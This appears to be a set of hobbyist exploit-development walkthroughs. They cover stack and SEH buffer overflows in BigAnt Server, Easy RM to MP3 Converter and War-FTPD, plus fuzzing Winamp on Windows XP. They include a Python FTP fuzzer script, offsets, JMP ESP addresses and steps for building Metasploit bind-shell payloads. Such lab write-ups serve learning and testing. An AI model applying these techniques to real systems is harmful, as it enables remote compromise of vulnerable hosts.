Buffer Overflow ( SEH ): Bigant Server ( 2.52 )

Come back to exploitation, now to learn about buffer overflow with SEH for Bigannt aplication. Lets to hunt:

1. Create fuzzer with python.

2. Running Bigant on windows xp.

3. Running fuzer ==> # python fuzzer.py

4. To see effect of fuzzer open  ollydb

5. View--SEH chain and shift+F9

6. Search running library service (.dll ) to jump POP POP RETN
    ==> In this case use vbajet32.dll

  
7. Copy vbajet32.dll to backtrack and cek dllcharacteristic with msfpescan.

8. Open module vbajet32.dll ==> Executables Modules==>search for
     ==> Sequence of command

9. Search POP POP RETN to see address.

10. Now look for address which use for control CPU.

11. Looking for offset==> using create pattern with Msf==>Fuzzer

12. Running fuzzer and see the result.

13. View==> SEH chain to see seh result

14. Shift + F9==> to see value in EIP==> cek offset value with pattern offset

15. Cek bad charackter ==> if seh chain to vbajet32.dll ( it's sound good).

==> I will explain to observation bad char in next section

        Assumed we know the bad char is 0x00 0x0a 0x0d 0x20 0x25


16. Generate  payload with msfweb

17. Modify Fuzzer with payload content.

18. Execute Fuzzer & telnet

             

==> DONE <==

===================================================================================
===================================================================================

Make Winamp Crashes With Fuzzer

How to make winamp crash? Why must do it? ==> looking for vulnerability. Lets to try :

A. Using swf file extention fuzzer.

     1. Create fuzzer ( with python).

          
     2. Open on winamp

     3. Result

B. Replace file timer.w5s with fuzzer file

     1. To file go directory ==> C:\Program Files\Winamp\System
     2. Create Fuzzer with python

     3. Replace file timer.w5s with fuzzer file.
     4. Running winamp ( will be crash )

      ==> Crash

The goal is looking for EIP overwrited -- but i have not found it.

" Try Harder "

===================================================================================
===================================================================================

Buffer Overflow: Local Exploit (Easy RM 2 MP3 Converter)

Now, i will try to trial a local exploitation. Aplication which use for exploition is easy rm to mp3 converter. Tools which use:
a. Ollydbg
b. Python
c. Aplication ( easy rm to mp3 converter ).

  NOTE :

# each change fuzzer script, must be save and running again.

( python <file.py> )



Let's to do this job :
1. Running windows xp and install easy rm to mp3 converter.

2. Create Fuzzer file with python script to create file playlist ( .m3u, .pls etc ).

      ==> running file Fuzz.py ==> # python Fuzz.py

==> create file (playlist file) fuzzer.

 
3. Running aplication and try load file playlist (crash.pls) .
     ==> If fuzzer succes apliaction will be crash ( close automaticly ).

4. Running again aplication and ollydbg to see overwrited register.

==> Result EBX and ESP overwrited with character "B".

5. Create pattern ==> with metasploit ==> ./create_pattern 60000 > file.txt

6. Modify fuzzer script with pattern.

6. Looking for offset position.

7. Check position of EIP register ==> \xEF\xBE\xAD\xDE

 

==> Running python <file>.py

8. Looking for JUMP ESP address

==> JUMP ESP address => 7CA7A787 => ( little endian ) =>\x87\xA7\xA7\x7C

9. Generate payload with msfweb ==> Windows Bind Shell 

 

 ==> Generate payload

9. Modify Fuzzer script with payload.

10.Running fuzzer script to create final playlist file with payload content.

==> Running telnet => # telnet 192.168.56.101 4444

 == DONE ==

===================================================================================
===================================================================================

Buffer Overflow : War-FTPD with Ollydbg and Msf ( Python Fuzzer Script )

I try to trial exploit War-FTPD aplication with buffer overflow method. To see software or aplication can be buffer overflow, try with fuzzing method. Let's to try :
1. Install War-ftpd and ollydbg on windows xp

2. Create fuzzer script with python.

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer="\41"*1500
s.connect (('192.168.56.101', 21))
data=s.recv(1024)
print("KIRIM....")
s.send('USER '+buffer+'\r \n')
data=s.recv(1024)
s.send('PASS '+'\r \n')
s.close()
print("Finish")

Save with <name>.py

2.  Running script ==> # python <name>.py

War-FTPD will crash because buffer overflow.

Now i see if War-FTPD can EIP overwrited.

3. Create pattern with pattern create in directory ==> /pentest/exploits/framework/tools/

==> to see open buffer.txt

4. Create Fuzzer  with buffer content of buffer.txt

5. Execute Fuzzer and see value of register 

6. Check pattern offset of EIP and ESP ==> /pentest/exploits/framework/tools/
     ==> ./pattern_offset.rb 32714131 ==> 485
     ==> ./pattern_offset.rb aq4Aq      ==> 493

 7. To verify register EIP will be get value from fuzzer => Modify fuzzer and see the pattern offset.

See EIP get value from fuzzer.

8. Modify fuzzer to give value ESP ( 1000 - 493 )

Result if fuzzer executed

9. Search JMP ESP address

Jump address ==> 7C9D30D7 ==> /xD7/x30/x9D/7C

10. Create  Fuzzer to test jump address.

Result:

11. Create payload with Msfweb ==> /pentest/exploits/framework2/ ==> open 127.0.0.1:55555

==> Windows bind shell code ==> Proccess ==>Restricted Char 0x00 0x0a 0xd ==> shikata-ga-nai

==> Copy Payload to Fuzzer aplication and running.

==> Fuzzer Script

==> Running Fuzzer

==> Running Telnet ( Exploited) == DONE

==========================================================================
==========================================================================